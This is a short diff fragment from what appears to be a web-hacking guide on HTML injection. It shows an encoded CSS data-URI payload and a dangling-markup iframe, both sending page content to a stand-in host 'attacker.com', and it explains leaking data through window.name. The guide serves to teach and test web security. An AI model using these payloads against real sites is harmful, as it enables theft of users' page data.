HTML Injection

 <link rel="stylesheet" href='data:text/css;charset=utf-16,%2A%00%7B%00b%00a%00c%00k%00g%00r%00o%00u%00n%00d%00%2D%00i%00m%00a%00g%00e%00%3A%00%20%00u%00r%00l%00%28%00h%00t%00t%00p%00s%00%3A%00%2F%00%2F%00a%00t%00t%00a%00c%00k%00e%00r%00%2E%00c%00o%00m%00%3F%00

-Although note that at this point, you are likely able to leak content through CSS Injection as well.
+Although note that at this point, you are likely able to leak content through [css-injection](https://book.jorianwoltjer.com/web/client-side/css-injection "mention") as well.

-variable as the attacker.
+When you are able to create an iframe with a remote source, the `name=` attribute is leakable cross-origin by reading the `window.name` variable as the attacker.
 This may include newlines, even on Chromium, because it is not a URL or target:

 <iframe src="https://attacker.com" name='